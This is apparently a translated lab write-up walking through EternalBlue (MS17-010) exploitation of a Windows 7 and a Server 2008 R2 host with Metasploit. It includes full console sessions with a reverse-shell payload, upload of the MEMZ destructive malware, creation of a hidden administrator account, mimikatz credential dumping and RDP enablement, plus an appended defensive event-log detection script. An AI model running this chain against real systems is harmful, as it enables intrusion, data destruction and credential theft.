
Penetration Testing of Windows 7 and Windows Server 2008 R2 from Kali Linux (MS17-010 Exploitation)

Author: 互联网

(MS17-010 exploitation: uploading the MEMZ virus)

 

 

1. Lab environment

Test platform: Kali Linux

IP address: 192.168.8.132

    Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux

Target 1: Windows 7 Professional SP1 x64

IP address: 192.168.8.133

Target 2: Windows 7 Professional SP1 x64

IP address: 192.168.8.8

Port scan: a port scan of the 192.168.8.0 subnet found two target hosts with TCP port 445 open.

Network topology of this lab: [figure 3.jpg]

2. Lab procedure

2.1 Penetration test against Windows 7

root@kali:~# msfconsole                     /* start Metasploit */

[-] Starting the Metasploit Framework console...-

[-] * WARNING: No database support: No database YAML file

[-] ***

     ,           ,

    /             \

   ((__---,,,---__))

      (_) O O (_)_________

         \ _ /            |\

          o_o \   M S F   | \

               \   _____  |  *

                |||   WW|||

                |||     |||

       =[ metasploit v5.0.60-dev                          ]

+ -- --=[ 1947 exploits - 1089 auxiliary - 333 post       ]

+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]

+ -- --=[ 7 evasion                                       ]

msf5 > search ms17-010      /* search for the EternalBlue (ms17-010) modules */

 

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/doublepulsar_rce           2017-04-14       great    Yes    DOUBLEPULSAR Payload Execution and Neutralization
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

 

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options   /* show the module options */

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   CHECK_ARCH  true             no        Check for architecture on vulnerable hosts
   CHECK_DOPU  true             no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE  false            no        Check for named pipe on vulnerable hosts
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       445              yes       The SMB service port (TCP)
   SMBDomain                    no        The Windows domain to use for authentication
   SMBPass                      no        The password for the specified username
   SMBUser                      no        The username to authenticate as
   THREADS     1                yes       The number of concurrent threads (max one per host)

 

msf5 > use auxiliary/scanner/smb/smb_ms17_010        /* load the vulnerability scanner module */

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.133

rhosts => 192.168.8.133

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

 

[+] 192.168.8.133:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.8.133:445     - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) >

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.133

rhosts => 192.168.8.133

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.132

lhost => 192.168.8.132

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

 

[*] Started reverse TCP handler on 192.168.8.132:4444

[+] 192.168.8.133:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.8.133:445 - Connecting to target for exploitation.

[+] 192.168.8.133:445 - Connection established for exploitation.

[+] 192.168.8.133:445 - Target OS selected valid for OS indicated by SMB reply

[*] 192.168.8.133:445 - CORE raw buffer dump (42 bytes)

[*] 192.168.8.133:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Professional 7601 Service Pack 1

[+] 192.168.8.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[+] 192.168.8.133:445 - Sending SMBv2 buffers

[+] 192.168.8.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.8.133:445 - Sending final SMBv2 buffers.

[+] 192.168.8.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] Sending stage (206403 bytes) to 192.168.8.133

[*] Meterpreter session 1 opened (192.168.8.132:4444 -> 192.168.8.133:49159) at 2020-03-17 01:09:21 -0400

[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=--=-WIN-=-=-==-=-=-=-=-=-=-=-=-

[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 

meterpreter >

 

meterpreter > sysinfo

Computer        : TODD-PC

OS              : Windows 7 (6.1 Build 7601, Service Pack 1).

Architecture    : x64

System Language : zh_CN

Domain          : WORKGROUP

Logged On Users : 2

Meterpreter     : x64/windows

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > screenshot

Screenshot saved to: /root/ZfhJyFXb.jpeg

meterpreter > lpwd

/root

meterpreter > lls

Listing Local: /root

====================

 

Mode              Size     Type  Last modified              Name

----              ----     ----  -------------              ----

100644/rw-r--r--  2740     fil   2020-03-17 00:19:35 -0400  .bash_history

100644/rw-r--r--  3391     fil   2019-11-25 07:24:30 -0500  .bashrc

40755/rwxr-xr-x   4096     dir   2020-01-17 01:40:32 -0500  .config

40755/rwxr-xr-x   4096     dir   2020-01-10 05:37:10 -0500  .msf4

100644/rw-r--r--  148      fil   2019-11-19 04:18:26 -0500  .profile

100600/rw-------  9825     fil   2020-03-16 22:14:37 -0400  .viminfo

40755/rwxr-xr-x   4096     dir   2020-01-17 02:53:20 -0500  Desktop

40755/rwxr-xr-x   4096     dir   2019-11-25 13:44:09 -0500  Documents

40755/rwxr-xr-x   4096     dir   2019-11-25 13:44:09 -0500  Downloads

100644/rw-r--r--  14848    fil   2016-07-09 20:59:44 -0400  memz.exe

100644/rw-r--r--  2527232  fil   2017-09-23 12:50:28 -0400  永恒之绿.exe

meterpreter > upload memz.exe c:\\

[*] uploading  : memz.exe -> c:\

[*] uploaded   : memz.exe -> c:\\memz.exe

meterpreter > download c:\\haha.txt

[*] Downloading: c:\haha.txt -> haha.txt

[*] Downloaded 8.00 B of 8.00 B (100.0%): c:\haha.txt -> haha.txt

[*] download   : c:\haha.txt -> haha.txt

 

meterpreter > shell

Process 2772 created.

Channel 1 created.

Microsoft Windows [版本 6.1.7601]

版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>

 

C:\Windows\system32>chcp 65001

chcp 65001

Active code page: 65001

C:\Windows\system32>cd \

C:\>

C:\>dir

Volume in drive C has no label.

 Volume Serial Number is F496-8A44

 Directory of C:\

 

2020/03/17  13:48                 8 haha.txt

2020/03/17  13:48            14,848 memz.exe

2009/07/14  11:20    <DIR>          PerfLogs

2020/01/10  21:19    <DIR>          Program Files

2020/01/23  14:04    <DIR>          Program Files (x86)

2020/01/10  21:14    <DIR>          Users

2020/01/10  21:16    <DIR>          Windows

               2 File(s)         14,856 bytes

               5 Dir(s)  52,709,482,496 bytes free

 

C:\Windows\system32>net user aa 123456 /add

net user aa 123456 /add

The command completed successfully.

C:\Windows\system32>net user

net user

 

User accounts for \\

---------------------------------------------------------------------------

aa                   Administrator            Guest                                  Todd

The command completed with one or more errors.

 

C:\Windows\system32>net user aa

net user aa

User name                    aa

Full Name

Comment

User's comment

Country code                 000 (System Default)

Account active               Yes

Account expires              Never

 

Password last set            2020/3/17 14:02:43

Password expires             2020/4/28 14:02:43

Password changeable          2020/3/17 14:02:43

Password required            Yes

User may change password     Yes

 

 

Local Group Memberships      *Users

Global Group memberships     *None

The command completed successfully.

C:\Windows\system32>net localgroup administrators aa /add

net localgroup administrators aa /add

The command completed successfully.

 

C:\Windows\system32>net user aa

User name                    aa

Account active               Yes

Account expires              Never

 

Password last set            2020/3/17 14:02:43

Password expires             2020/4/28 14:02:43

Password changeable          2020/3/17 14:02:43

Password required            Yes

 

Local Group Memberships      *Administrators       *Users

Global Group memberships     *None

The command completed successfully.

C:\Windows\system32>exit

exit

meterpreter > load mimikatz

Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (6.1 Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?

Success.

meterpreter > wdigest

[+] Running as SYSTEM

[*] Retrieving wdigest credentials

wdigest credentials

===================

 

AuthID     Package    Domain        User           Password

------     -------    ------        ----           --------

0;997      Negotiate  NT AUTHORITY  LOCAL SERVICE

0;999      NTLM       WORKGROUP     TODD-PC$

0;2454496  NTLM       Todd-PC       aa             123456

0;293566   NTLM       Todd-PC       Todd           qwert

meterpreter > run post/windows/manage/enable_rdp

 

[*] Enabling Remote Desktop

[*]     RDP is already enabled

[*] Setting Terminal Services service startup mode

[*]     Terminal Services service is already set to auto

[*]     Opening port in local firewall if necessary

[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317022920_default_192.168.8.133_host.windows.cle_555893.txt

 

Alternatively, let the module create the account itself:

meterpreter > run post/windows/manage/enable_rdp USERNAME=bb PASSWORD=password

 

[*] Enabling Remote Desktop

[*]     RDP is disabled; enabling it ...

[*] Setting Terminal Services service startup mode

[*]     The Terminal Services service is not set to auto, changing it to auto ...

[*]     Opening port in local firewall if necessary

[*] Setting user account for logon

[*]     Adding User: bb with Password: password

[*]     Adding User: bb to local group 'Remote Desktop Users'

[*]     Hiding user from Windows Login screen

[*]     Adding User: bb to local group 'Administrators'

[*] You can now login with the created user

[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317022750_default_192.168.8.133_host.windows.cle_306010.txt

meterpreter >

 

meterpreter > exit

msf5 exploit(windows/smb/ms17_010_eternalblue) > exit

root@kali:~#

 

2.2 Penetration test against Windows Server 2008 R2

root@kali:~# msfconsole

[-] Starting the Metasploit Framework console.../

[-] * WARNING: No database support: No database YAML file

+ -- --=[ 1947 exploits - 1089 auxiliary - 333 post       ]

+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]

+ -- --=[ 7 evasion                                       ]

msf5 >

 

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.8

rhosts => 192.168.8.8

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

 

[+] 192.168.8.8:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.8.8:445       - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.8

rhosts => 192.168.8.8

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.132

lhost => 192.168.8.132

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

 

[*] Started reverse TCP handler on 192.168.8.132:4444

[+] 192.168.8.8:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.8.8:445 - Connecting to target for exploitation.

[+] 192.168.8.8:445 - Connection established for exploitation.

[*] 192.168.8.8:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2008 R2 Enterpris 7601 Service Pack 1

[+] 192.168.8.8:445 - Sending SMBv2 buffers

[+] 192.168.8.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.8.8:445 - Sending final SMBv2 buffers.

[+] 192.168.8.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] Sending stage (206403 bytes) to 192.168.8.8

[*] Meterpreter session 1 opened (192.168.8.132:4444 -> 192.168.8.8:49160) at 2020-03-17 03:11:44 -0400

[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-==-WIN-=-=-=--=-=-=-=-=-=-=-=-

[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

meterpreter >

 

meterpreter > sysinfo

Computer        : WIN-2F0T37AEMO0

OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).

Architecture    : x64

System Language : zh_CN

Domain          : WORKGROUP

Logged On Users : 1

Meterpreter     : x64/windows

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > screenshot

Screenshot saved to: /root/FEbrdmoh.jpeg

meterpreter > load mimikatz

Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 2008 R2 (6.1 Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?

Success.

meterpreter > wdigest

[+] Running as SYSTEM

[*] Retrieving wdigest credentials

wdigest credentials

===================

AuthID    Package    Domain           User              Password

------    -------    ------           ----              --------

0;996     Negotiate  WORKGROUP        WIN-2F0T37AEMO0$

0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE

0;254894  NTLM       WIN-2F0T37AEMO0  Administrator     a1!

 

meterpreter > run post/windows/manage/enable_rdp

 

[*] Enabling Remote Desktop

[*]     RDP is already enabled

[*] Setting Terminal Services service startup mode

[*]     Terminal Services service is already set to auto

[*]     Opening port in local firewall if necessary

[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317031353_default_192.168.8.8_host.windows.cle_637762.txt
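As an added defensive example (not part of the original post): the post-exploitation chain shown above (net user /add, net localgroup administrators /add, then a Remote Desktop logon as the new account) leaves a recognizable trail in the Windows Security log, and this Python script correlates those events per host. The event IDs are real Windows IDs; the event records and their field names are constructed sample data, not logs from the lab machines.

```python
"""Added example (not from the original post): flag accounts that were created
and promoted to Administrators within a short window, and note whether the
account then logged on over RDP. Event IDs are real (4720 = user account
created, 4732 = member added to a security-enabled local group,
4624 with logon type 10 = RemoteInteractive/RDP); the records below and their
field names are constructed sample data."""
from collections import defaultdict
from datetime import datetime, timedelta

ADMINS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators

# Constructed sample events: (timestamp, host, event_id, fields)
SAMPLE_EVENTS = [
    ("2020-03-17 14:02:43", "TODD-PC", 4720, {"target": "aa", "subject": "TODD-PC$"}),
    ("2020-03-17 14:03:10", "TODD-PC", 4732, {"member": "aa", "group_sid": ADMINS_SID}),
    ("2020-03-17 14:05:01", "TODD-PC", 4624, {"user": "aa", "logon_type": 10}),
    ("2020-03-17 09:00:00", "HR-PC", 4720, {"target": "jsmith", "subject": "admin"}),
    ("2020-03-18 09:00:00", "HR-PC", 4624, {"user": "jsmith", "logon_type": 2}),
]


def find_rogue_admins(events, window=timedelta(hours=1)):
    """Return (host, account, stages) for each account created and then added to
    Administrators within `window`. `stages` lists what was observed:
    'created', 'admin', and 'rdp_logon' if the account later logged on via RDP.
    Creation followed by promotion is the alert condition; an RDP logon by the
    same account raises confidence that the chain above was run."""
    created = defaultdict(dict)  # host -> account -> creation time
    hits = {}
    for ts, host, eid, f in sorted(events, key=lambda e: e[0]):
        t = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        if eid == 4720:
            created[host][f["target"]] = t
        elif eid == 4732 and f.get("group_sid") == ADMINS_SID:
            t0 = created[host].get(f["member"])
            if t0 is not None and t - t0 <= window:
                hits[(host, f["member"])] = ["created", "admin"]
        elif eid == 4624 and f.get("logon_type") == 10:
            key = (host, f["user"])
            if key in hits:
                hits[key].append("rdp_logon")
    return [(h, a, s) for (h, a), s in hits.items()]


if __name__ == "__main__":
    for host, account, stages in find_rogue_admins(SAMPLE_EVENTS):
        print(f"ALERT {host}: account '{account}' {' -> '.join(stages)}")
```

The same correlation applies to the enable_rdp module's own account (it creates the user, adds it to Remote Desktop Users and Administrators, and hides it from the logon screen), so the 4720/4732 pair is the higher-value signal than the RDP logon itself.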


3. Results

3.1 Log in to the target from the Kali terminal with the rdesktop remote-desktop client:

root@kali:~# rdesktop 192.168.8.133

 

ATTENTION! Found a certificate stored for host '192.168.8.133', but it does not match the certificate

  Certificate fingerprints:

  sha1: cbbee169f5929f8c048c428feb6792fb66ab3446

  sha256: 77dfda959a5f9717c08ecb6a224255f2cda71aa57695616e6c1c38e1f97d36c7

Do you trust this certificate (yes/no)?  yes

[Figures 5 and 6]

3.2 Log in to the target with Remote Desktop from Windows:

[Figures 7, 8 and 9]

Windows Server 2008 R2

[Figures 10 and 11]

Source: https://blog.51cto.com/toddliu/2479733